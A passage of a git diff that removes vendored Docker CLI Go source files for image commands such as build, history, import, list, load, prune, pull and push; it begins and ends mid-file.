-	if buildCtx == nil {
-		// And canonicalize dockerfile name to a platform-independent one
-		relDockerfile, err = archive.CanonicalTarNameForPath(relDockerfile)
-		if err != nil {
-			return fmt.Errorf("cannot canonicalize dockerfile path %s: %v", relDockerfile, err)
-		}
-
-		f, err := os.Open(filepath.Join(contextDir, ".dockerignore"))
-		if err != nil && !os.IsNotExist(err) {
-			return err
-		}
-		defer f.Close()
-
-		var excludes []string
-		if err == nil {
-			excludes, err = dockerignore.ReadAll(f)
-			if err != nil {
-				return err
-			}
-		}
-
-		if err := builder.ValidateContextDirectory(contextDir, excludes); err != nil {
-			return fmt.Errorf("Error checking context: '%s'.", err)
-		}
-
-		// If .dockerignore mentions .dockerignore or the Dockerfile
-		// then make sure we send both files over to the daemon
-		// because Dockerfile is, obviously, needed no matter what, and
-		// .dockerignore is needed to know if either one needs to be
-		// removed. The daemon will remove them for us, if needed, after it
-		// parses the Dockerfile. Ignore errors here, as they will have been
-		// caught by validateContextDirectory above.
-		var includes = []string{"."}
-		keepThem1, _ := fileutils.Matches(".dockerignore", excludes)
-		keepThem2, _ := fileutils.Matches(relDockerfile, excludes)
-		if keepThem1 || keepThem2 {
-			includes = append(includes, ".dockerignore", relDockerfile)
-		}
-
-		compression := archive.Uncompressed
-		if options.compress {
-			compression = archive.Gzip
-		}
-		buildCtx, err = archive.TarWithOptions(contextDir, &archive.TarOptions{
-			Compression:     compression,
-			ExcludePatterns: excludes,
-			IncludeFiles:    includes,
-		})
-		if err != nil {
-			return err
-		}
-	}
-
-	ctx := context.Background()
-
-	var resolvedTags []*resolvedTag
-	if command.IsTrusted() {
-		translator := func(ctx context.Context, ref reference.NamedTagged) (reference.Canonical, error) {
-			return TrustedReference(ctx, dockerCli, ref, nil)
-		}
-		// Wrap the tar archive to replace the Dockerfile entry with the rewritten
-		// Dockerfile which uses trusted pulls.
-		buildCtx = replaceDockerfileTarWrapper(ctx, buildCtx, relDockerfile, translator, &resolvedTags)
-	}
-
-	// Setup an upload progress bar
-	progressOutput := streamformatter.NewStreamFormatter().NewProgressOutput(progBuff, true)
-	if !dockerCli.Out().IsTerminal() {
-		progressOutput = &lastProgressOutput{output: progressOutput}
-	}
-
-	var body io.Reader = progress.NewProgressReader(buildCtx, progressOutput, 0, "", "Sending build context to Docker daemon")
-
-	var memory int64
-	if options.memory != "" {
-		parsedMemory, err := units.RAMInBytes(options.memory)
-		if err != nil {
-			return err
-		}
-		memory = parsedMemory
-	}
-
-	var memorySwap int64
-	if options.memorySwap != "" {
-		if options.memorySwap == "-1" {
-			memorySwap = -1
-		} else {
-			parsedMemorySwap, err := units.RAMInBytes(options.memorySwap)
-			if err != nil {
-				return err
-			}
-			memorySwap = parsedMemorySwap
-		}
-	}
-
-	var shmSize int64
-	if options.shmSize != "" {
-		shmSize, err = units.RAMInBytes(options.shmSize)
-		if err != nil {
-			return err
-		}
-	}
-
-	authConfigs, _ := dockerCli.GetAllCredentials()
-	buildOptions := types.ImageBuildOptions{
-		Memory:         memory,
-		MemorySwap:     memorySwap,
-		Tags:           options.tags.GetAll(),
-		SuppressOutput: options.quiet,
-		NoCache:        options.noCache,
-		Remove:         options.rm,
-		ForceRemove:    options.forceRm,
-		PullParent:     options.pull,
-		Isolation:      container.Isolation(options.isolation),
-		CPUSetCPUs:     options.cpuSetCpus,
-		CPUSetMems:     options.cpuSetMems,
-		CPUShares:      options.cpuShares,
-		CPUQuota:       options.cpuQuota,
-		CPUPeriod:      options.cpuPeriod,
-		CgroupParent:   options.cgroupParent,
-		Dockerfile:     relDockerfile,
-		ShmSize:        shmSize,
-		Ulimits:        options.ulimits.GetList(),
-		BuildArgs:      runconfigopts.ConvertKVStringsToMapWithNil(options.buildArgs.GetAll()),
-		AuthConfigs:    authConfigs,
-		Labels:         runconfigopts.ConvertKVStringsToMap(options.labels.GetAll()),
-		CacheFrom:      options.cacheFrom,
-		SecurityOpt:    options.securityOpt,
-		NetworkMode:    options.networkMode,
-		Squash:         options.squash,
-	}
-
-	response, err := dockerCli.Client().ImageBuild(ctx, body, buildOptions)
-	if err != nil {
-		if options.quiet {
-			fmt.Fprintf(dockerCli.Err(), "%s", progBuff)
-		}
-		return err
-	}
-	defer response.Body.Close()
-
-	err = jsonmessage.DisplayJSONMessagesStream(response.Body, buildBuff, dockerCli.Out().FD(), dockerCli.Out().IsTerminal(), nil)
-	if err != nil {
-		if jerr, ok := err.(*jsonmessage.JSONError); ok {
-			// If no error code is set, default to 1
-			if jerr.Code == 0 {
-				jerr.Code = 1
-			}
-			if options.quiet {
-				fmt.Fprintf(dockerCli.Err(), "%s%s", progBuff, buildBuff)
-			}
-			return cli.StatusError{Status: jerr.Message, StatusCode: jerr.Code}
-		}
-	}
-
-	// Windows: show error message about modified file permissions if the
-	// daemon isn't running Windows.
-	if response.OSType != "windows" && runtime.GOOS == "windows" && !options.quiet {
-		fmt.Fprintln(dockerCli.Err(), `SECURITY WARNING: You are building a Docker image from Windows against a non-Windows Docker host. All files and directories added to build context will have '-rwxr-xr-x' permissions. It is recommended to double check and reset permissions for sensitive files and directories.`)
-	}
-
-	// Everything worked so if -q was provided the output from the daemon
-	// should be just the image ID and we'll print that to stdout.
-	if options.quiet {
-		fmt.Fprintf(dockerCli.Out(), "%s", buildBuff)
-	}
-
-	if command.IsTrusted() {
-		// Since the build was successful, now we must tag any of the resolved
-		// images from the above Dockerfile rewrite.
-		for _, resolved := range resolvedTags {
-			if err := TagTrusted(ctx, dockerCli, resolved.digestRef, resolved.tagRef); err != nil {
-				return err
-			}
-		}
-	}
-
-	return nil
-}
-
-type translatorFunc func(context.Context, reference.NamedTagged) (reference.Canonical, error)
-
-// validateTag checks if the given image name can be resolved.
-func validateTag(rawRepo string) (string, error) {
-	_, err := reference.ParseNamed(rawRepo)
-	if err != nil {
-		return "", err
-	}
-
-	return rawRepo, nil
-}
-
-var dockerfileFromLinePattern = regexp.MustCompile(`(?i)^[\s]*FROM[ \f\r\t\v]+(?P<image>[^ \f\r\t\v\n#]+)`)
-
-// resolvedTag records the repository, tag, and resolved digest reference
-// from a Dockerfile rewrite.
-type resolvedTag struct {
-	digestRef reference.Canonical
-	tagRef    reference.NamedTagged
-}
-
-// rewriteDockerfileFrom rewrites the given Dockerfile by resolving images in
-// "FROM <image>" instructions to a digest reference. `translator` is a
-// function that takes a repository name and tag reference and returns a
-// trusted digest reference.
-func rewriteDockerfileFrom(ctx context.Context, dockerfile io.Reader, translator translatorFunc) (newDockerfile []byte, resolvedTags []*resolvedTag, err error) {
-	scanner := bufio.NewScanner(dockerfile)
-	buf := bytes.NewBuffer(nil)
-
-	// Scan the lines of the Dockerfile, looking for a "FROM" line.
-	for scanner.Scan() {
-		line := scanner.Text()
-
-		matches := dockerfileFromLinePattern.FindStringSubmatch(line)
-		if matches != nil && matches[1] != api.NoBaseImageSpecifier {
-			// Replace the line with a resolved "FROM repo@digest"
-			ref, err := reference.ParseNamed(matches[1])
-			if err != nil {
-				return nil, nil, err
-			}
-			ref = reference.WithDefaultTag(ref)
-			if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() {
-				trustedRef, err := translator(ctx, ref)
-				if err != nil {
-					return nil, nil, err
-				}
-
-				line = dockerfileFromLinePattern.ReplaceAllLiteralString(line, fmt.Sprintf("FROM %s", trustedRef.String()))
-				resolvedTags = append(resolvedTags, &resolvedTag{
-					digestRef: trustedRef,
-					tagRef:    ref,
-				})
-			}
-		}
-
-		_, err := fmt.Fprintln(buf, line)
-		if err != nil {
-			return nil, nil, err
-		}
-	}
-
-	return buf.Bytes(), resolvedTags, scanner.Err()
-}
-
-// replaceDockerfileTarWrapper wraps the given input tar archive stream and
-// replaces the entry with the given Dockerfile name with the contents of the
-// new Dockerfile. Returns a new tar archive stream with the replaced
-// Dockerfile.
-func replaceDockerfileTarWrapper(ctx context.Context, inputTarStream io.ReadCloser, dockerfileName string, translator translatorFunc, resolvedTags *[]*resolvedTag) io.ReadCloser {
-	pipeReader, pipeWriter := io.Pipe()
-	go func() {
-		tarReader := tar.NewReader(inputTarStream)
-		tarWriter := tar.NewWriter(pipeWriter)
-
-		defer inputTarStream.Close()
-
-		for {
-			hdr, err := tarReader.Next()
-			if err == io.EOF {
-				// Signals end of archive.
-				tarWriter.Close()
-				pipeWriter.Close()
-				return
-			}
-			if err != nil {
-				pipeWriter.CloseWithError(err)
-				return
-			}
-
-			content := io.Reader(tarReader)
-			if hdr.Name == dockerfileName {
-				// This entry is the Dockerfile. Since the tar archive was
-				// generated from a directory on the local filesystem, the
-				// Dockerfile will only appear once in the archive.
-				var newDockerfile []byte
-				newDockerfile, *resolvedTags, err = rewriteDockerfileFrom(ctx, content, translator)
-				if err != nil {
-					pipeWriter.CloseWithError(err)
-					return
-				}
-				hdr.Size = int64(len(newDockerfile))
-				content = bytes.NewBuffer(newDockerfile)
-			}
-
-			if err := tarWriter.WriteHeader(hdr); err != nil {
-				pipeWriter.CloseWithError(err)
-				return
-			}
-
-			if _, err := io.Copy(tarWriter, content); err != nil {
-				pipeWriter.CloseWithError(err)
-				return
-			}
-		}
-	}()
-
-	return pipeReader
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/cmd.go b/vendor/github.com/docker/docker/cli/command/image/cmd.go
deleted file mode 100644
index c3ca61f85b..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/cmd.go
+++ /dev/null
@@ -1,33 +0,0 @@
-package image
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewImageCommand returns a cobra command for `image` subcommands
-func NewImageCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "image",
-		Short: "Manage images",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		NewBuildCommand(dockerCli),
-		NewHistoryCommand(dockerCli),
-		NewImportCommand(dockerCli),
-		NewLoadCommand(dockerCli),
-		NewPullCommand(dockerCli),
-		NewPushCommand(dockerCli),
-		NewSaveCommand(dockerCli),
-		NewTagCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-		newInspectCommand(dockerCli),
-		NewPruneCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/history.go b/vendor/github.com/docker/docker/cli/command/image/history.go
deleted file mode 100644
index 91c8f75a63..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/history.go
+++ /dev/null
@@ -1,99 +0,0 @@
-package image
-
-import (
-	"fmt"
-	"strconv"
-	"strings"
-	"text/tabwriter"
-	"time"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type historyOptions struct {
-	image string
-
-	human   bool
-	quiet   bool
-	noTrunc bool
-}
-
-// NewHistoryCommand creates a new `docker history` command
-func NewHistoryCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts historyOptions
-
-	cmd := &cobra.Command{
-		Use:   "history [OPTIONS] IMAGE",
-		Short: "Show the history of an image",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.image = args[0]
-			return runHistory(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.human, "human", "H", true, "Print sizes and dates in human readable format")
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs")
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
-
-	return cmd
-}
-
-func runHistory(dockerCli *command.DockerCli, opts historyOptions) error {
-	ctx := context.Background()
-
-	history, err := dockerCli.Client().ImageHistory(ctx, opts.image)
-	if err != nil {
-		return err
-	}
-
-	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
-
-	if opts.quiet {
-		for _, entry := range history {
-			if opts.noTrunc {
-				fmt.Fprintf(w, "%s\n", entry.ID)
-			} else {
-				fmt.Fprintf(w, "%s\n", stringid.TruncateID(entry.ID))
-			}
-		}
-		w.Flush()
-		return nil
-	}
-
-	var imageID string
-	var createdBy string
-	var created string
-	var size string
-
-	fmt.Fprintln(w, "IMAGE\tCREATED\tCREATED BY\tSIZE\tCOMMENT")
-	for _, entry := range history {
-		imageID = entry.ID
-		createdBy = strings.Replace(entry.CreatedBy, "\t", " ", -1)
-		if !opts.noTrunc {
-			createdBy = stringutils.Ellipsis(createdBy, 45)
-			imageID = stringid.TruncateID(entry.ID)
-		}
-
-		if opts.human {
-			created = units.HumanDuration(time.Now().UTC().Sub(time.Unix(entry.Created, 0))) + " ago"
-			size = units.HumanSizeWithPrecision(float64(entry.Size), 3)
-		} else {
-			created = time.Unix(entry.Created, 0).Format(time.RFC3339)
-			size = strconv.FormatInt(entry.Size, 10)
-		}
-
-		fmt.Fprintf(w, "%s\t%s\t%s\t%s\t%s\n", imageID, created, createdBy, size, entry.Comment)
-	}
-	w.Flush()
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/import.go b/vendor/github.com/docker/docker/cli/command/image/import.go
deleted file mode 100644
index 60024fb53c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/import.go
+++ /dev/null
@@ -1,88 +0,0 @@
-package image
-
-import (
-	"io"
-	"os"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	dockeropts "github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/pkg/urlutil"
-	"github.com/spf13/cobra"
-)
-
-type importOptions struct {
-	source    string
-	reference string
-	changes   dockeropts.ListOpts
-	message   string
-}
-
-// NewImportCommand creates a new `docker import` command
-func NewImportCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts importOptions
-
-	cmd := &cobra.Command{
-		Use:   "import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]",
-		Short: "Import the contents from a tarball to create a filesystem image",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.source = args[0]
-			if len(args) > 1 {
-				opts.reference = args[1]
-			}
-			return runImport(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	opts.changes = dockeropts.NewListOpts(nil)
-	flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image")
-	flags.StringVarP(&opts.message, "message", "m", "", "Set commit message for imported image")
-
-	return cmd
-}
-
-func runImport(dockerCli *command.DockerCli, opts importOptions) error {
-	var (
-		in      io.Reader
-		srcName = opts.source
-	)
-
-	if opts.source == "-" {
-		in = dockerCli.In()
-	} else if !urlutil.IsURL(opts.source) {
-		srcName = "-"
-		file, err := os.Open(opts.source)
-		if err != nil {
-			return err
-		}
-		defer file.Close()
-		in = file
-	}
-
-	source := types.ImageImportSource{
-		Source:     in,
-		SourceName: srcName,
-	}
-
-	options := types.ImageImportOptions{
-		Message: opts.message,
-		Changes: opts.changes.GetAll(),
-	}
-
-	clnt := dockerCli.Client()
-
-	responseBody, err := clnt.ImageImport(context.Background(), source, opts.reference, options)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/inspect.go b/vendor/github.com/docker/docker/cli/command/image/inspect.go
deleted file mode 100644
index 217863c772..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/inspect.go
+++ /dev/null
@@ -1,44 +0,0 @@
-package image
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/inspect"
-	"github.com/spf13/cobra"
-)
-
-type inspectOptions struct {
-	format string
-	refs   []string
-}
-
-// newInspectCommand creates a new cobra.Command for `docker image inspect`
-func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts inspectOptions
-
-	cmd := &cobra.Command{
-		Use:   "inspect [OPTIONS] IMAGE [IMAGE...]",
-		Short: "Display detailed information on one or more images",
-		Args:  cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.refs = args
-			return runInspect(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
-	return cmd
-}
-
-func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	getRefFunc := func(ref string) (interface{}, []byte, error) {
-		return client.ImageInspectWithRaw(ctx, ref)
-	}
-	return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/list.go b/vendor/github.com/docker/docker/cli/command/image/list.go
deleted file mode 100644
index 679604fc02..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/list.go
+++ /dev/null
@@ -1,96 +0,0 @@
-package image
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/formatter"
-	"github.com/docker/docker/opts"
-	"github.com/spf13/cobra"
-)
-
-type imagesOptions struct {
-	matchName string
-
-	quiet       bool
-	all         bool
-	noTrunc     bool
-	showDigests bool
-	format      string
-	filter      opts.FilterOpt
-}
-
-// NewImagesCommand creates a new `docker images` command
-func NewImagesCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := imagesOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "images [OPTIONS] [REPOSITORY[:TAG]]",
-		Short: "List images",
-		Args:  cli.RequiresMaxArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if len(args) > 0 {
-				opts.matchName = args[0]
-			}
-			return runImages(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs")
-	flags.BoolVarP(&opts.all, "all", "a", false, "Show all images (default hides intermediate images)")
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
-	flags.BoolVar(&opts.showDigests, "digests", false, "Show digests")
-	flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-
-	return cmd
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := *NewImagesCommand(dockerCli)
-	cmd.Aliases = []string{"images", "list"}
-	cmd.Use = "ls [OPTIONS] [REPOSITORY[:TAG]]"
-	return &cmd
-}
-
-func runImages(dockerCli *command.DockerCli, opts imagesOptions) error {
-	ctx := context.Background()
-
-	filters := opts.filter.Value()
-	if opts.matchName != "" {
-		filters.Add("reference", opts.matchName)
-	}
-
-	options := types.ImageListOptions{
-		All:     opts.all,
-		Filters: filters,
-	}
-
-	images, err := dockerCli.Client().ImageList(ctx, options)
-	if err != nil {
-		return err
-	}
-
-	format := opts.format
-	if len(format) == 0 {
-		if len(dockerCli.ConfigFile().ImagesFormat) > 0 && !opts.quiet {
-			format = dockerCli.ConfigFile().ImagesFormat
-		} else {
-			format = formatter.TableFormatKey
-		}
-	}
-
-	imageCtx := formatter.ImageContext{
-		Context: formatter.Context{
-			Output: dockerCli.Out(),
-			Format: formatter.NewImageFormat(format, opts.quiet, opts.showDigests),
-			Trunc:  !opts.noTrunc,
-		},
-		Digest: opts.showDigests,
-	}
-	return formatter.ImageWrite(imageCtx, images)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/load.go b/vendor/github.com/docker/docker/cli/command/image/load.go
deleted file mode 100644
index 988f5106e2..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/load.go
+++ /dev/null
@@ -1,77 +0,0 @@
-package image
-
-import (
-	"fmt"
-	"io"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/pkg/system"
-	"github.com/spf13/cobra"
-)
-
-type loadOptions struct {
-	input string
-	quiet bool
-}
-
-// NewLoadCommand creates a new `docker load` command
-func NewLoadCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts loadOptions
-
-	cmd := &cobra.Command{
-		Use:   "load [OPTIONS]",
-		Short: "Load an image from a tar archive or STDIN",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runLoad(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.input, "input", "i", "", "Read from tar archive file, instead of STDIN")
-	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Suppress the load output")
-
-	return cmd
-}
-
-func runLoad(dockerCli *command.DockerCli, opts loadOptions) error {
-
-	var input io.Reader = dockerCli.In()
-	if opts.input != "" {
-		// We use system.OpenSequential to use sequential file access on Windows, avoiding
-		// depleting the standby list un-necessarily. On Linux, this equates to a regular os.Open.
-		file, err := system.OpenSequential(opts.input)
-		if err != nil {
-			return err
-		}
-		defer file.Close()
-		input = file
-	}
-
-	// To avoid getting stuck, verify that a tar file is given either in
-	// the input flag or through stdin and if not display an error message and exit.
-	if opts.input == "" && dockerCli.In().IsTerminal() {
-		return fmt.Errorf("requested load from stdin, but stdin is empty")
-	}
-
-	if !dockerCli.Out().IsTerminal() {
-		opts.quiet = true
-	}
-	response, err := dockerCli.Client().ImageLoad(context.Background(), input, opts.quiet)
-	if err != nil {
-		return err
-	}
-	defer response.Body.Close()
-
-	if response.Body != nil && response.JSON {
-		return jsonmessage.DisplayJSONMessagesToStream(response.Body, dockerCli.Out(), nil)
-	}
-
-	_, err = io.Copy(dockerCli.Out(), response.Body)
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/prune.go b/vendor/github.com/docker/docker/cli/command/image/prune.go
deleted file mode 100644
index 82c28fcf49..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/prune.go
+++ /dev/null
@@ -1,92 +0,0 @@
-package image
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	units "github.com/docker/go-units"
-	"github.com/spf13/cobra"
-)
-
-type pruneOptions struct {
-	force bool
-	all   bool
-}
-
-// NewPruneCommand returns a new cobra prune command for images
-func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pruneOptions
-
-	cmd := &cobra.Command{
-		Use:   "prune [OPTIONS]",
-		Short: "Remove unused images",
-		Args:  cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			spaceReclaimed, output, err := runPrune(dockerCli, opts)
-			if err != nil {
-				return err
-			}
-			if output != "" {
-				fmt.Fprintln(dockerCli.Out(), output)
-			}
-			fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
-			return nil
-		},
-		Tags: map[string]string{"version": "1.25"},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
-	flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images, not just dangling ones")
-
-	return cmd
-}
-
-const (
-	allImageWarning = `WARNING! This will remove all images without at least one container associated to them.
-Are you sure you want to continue?`
-	danglingWarning = `WARNING! This will remove all dangling images.
-Are you sure you want to continue?`
-)
-
-func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) {
-	pruneFilters := filters.NewArgs()
-	pruneFilters.Add("dangling", fmt.Sprintf("%v", !opts.all))
-
-	warning := danglingWarning
-	if opts.all {
-		warning = allImageWarning
-	}
-	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
-		return
-	}
-
-	report, err := dockerCli.Client().ImagesPrune(context.Background(), pruneFilters)
-	if err != nil {
-		return
-	}
-
-	if len(report.ImagesDeleted) > 0 {
-		output = "Deleted Images:\n"
-		for _, st := range report.ImagesDeleted {
-			if st.Untagged != "" {
-				output += fmt.Sprintln("untagged:", st.Untagged)
-			} else {
-				output += fmt.Sprintln("deleted:", st.Deleted)
-			}
-		}
-		spaceReclaimed = report.SpaceReclaimed
-	}
-
-	return
-}
-
-// RunPrune calls the Image Prune API
-// This returns the amount of space reclaimed and a detailed output string
-func RunPrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) {
-	return runPrune(dockerCli, pruneOptions{force: true, all: all})
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/pull.go b/vendor/github.com/docker/docker/cli/command/image/pull.go
deleted file mode 100644
index 24933fe846..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/pull.go
+++ /dev/null
@@ -1,84 +0,0 @@
-package image
-
-import (
-	"errors"
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	"github.com/spf13/cobra"
-)
-
-type pullOptions struct {
-	remote string
-	all    bool
-}
-
-// NewPullCommand creates a new `docker pull` command
-func NewPullCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts pullOptions
-
-	cmd := &cobra.Command{
-		Use:   "pull [OPTIONS] NAME[:TAG|@DIGEST]",
-		Short: "Pull an image or a repository from a registry",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.remote = args[0]
-			return runPull(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVarP(&opts.all, "all-tags", "a", false, "Download all tagged images in the repository")
-	command.AddTrustedFlags(flags, true)
-
-	return cmd
-}
-
-func runPull(dockerCli *command.DockerCli, opts pullOptions) error {
-	distributionRef, err := reference.ParseNamed(opts.remote)
-	if err != nil {
-		return err
-	}
-	if opts.all && !reference.IsNameOnly(distributionRef) {
-		return errors.New("tag can't be used with --all-tags/-a")
-	}
-
-	if !opts.all && reference.IsNameOnly(distributionRef) {
-		distributionRef = reference.WithDefaultTag(distributionRef)
-		fmt.Fprintf(dockerCli.Out(), "Using default tag: %s\n", reference.DefaultTag)
-	}
-
-	// Resolve the Repository name from fqn to RepositoryInfo
-	repoInfo, err := registry.ParseRepositoryInfo(distributionRef)
-	if err != nil {
-		return err
-	}
-
-	ctx := context.Background()
-
-	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
-	requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "pull")
-
-	// Check if reference has a digest
-	_, isCanonical := distributionRef.(reference.Canonical)
-	if command.IsTrusted() && !isCanonical {
-		err = trustedPull(ctx, dockerCli, repoInfo, distributionRef, authConfig, requestPrivilege)
-	} else {
-		err = imagePullPrivileged(ctx, dockerCli, authConfig, distributionRef.String(), requestPrivilege, opts.all)
-	}
-	if err != nil {
-		if strings.Contains(err.Error(), "target is plugin") {
-			return errors.New(err.Error() + " - Use `docker plugin install`")
-		}
-		return err
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/push.go b/vendor/github.com/docker/docker/cli/command/image/push.go
deleted file mode 100644
index a8ce4945ec..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/push.go
+++ /dev/null
@@ -1,61 +0,0 @@
-package image
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	"github.com/spf13/cobra"
-)
-
-// NewPushCommand creates a new `docker push` command
-func NewPushCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "push [OPTIONS] NAME[:TAG]",
-		Short: "Push an image or a repository to a registry",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runPush(dockerCli, args[0])
-		},
-	}
-
-	flags := cmd.Flags()
-
-	command.AddTrustedFlags(flags, true)
-
-	return cmd
-}
-
-func runPush(dockerCli *command.DockerCli, remote string) error {
-	ref, err := reference.ParseNamed(remote)
-	if err != nil {
-		return err
-	}
-
-	// Resolve the Repository name from fqn to RepositoryInfo
-	repoInfo, err := registry.ParseRepositoryInfo(ref)
-	if err != nil {
-		return err
-	}
-
-	ctx := context.Background()
-
-	// Resolve the Auth config relevant for this server
-	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
-	requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "push")
-
-	if command.IsTrusted() {
-		return trustedPush(ctx, dockerCli, repoInfo, ref, authConfig, requestPrivilege)
-	}
-
-	responseBody, err := imagePushPrivileged(ctx, dockerCli, authConfig, ref.String(), requestPrivilege)
-	if err != nil {
-		return err
-	}
-
-	defer responseBody.Close()
-	return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/image/remove.go b/vendor/github.com/docker/docker/cli/command/image/remove.go
deleted file mode 100644
index c79ceba7a8..0000000000
--- a/vendor/github.com/docker/docker/cli/command/image/remove.go
+++ /dev/null
@@ -1,77 +0,0 @@
-package image
-
-import (
-	"fmt"
-	"strings"
-
-	"golang.org/x/net/context"
-
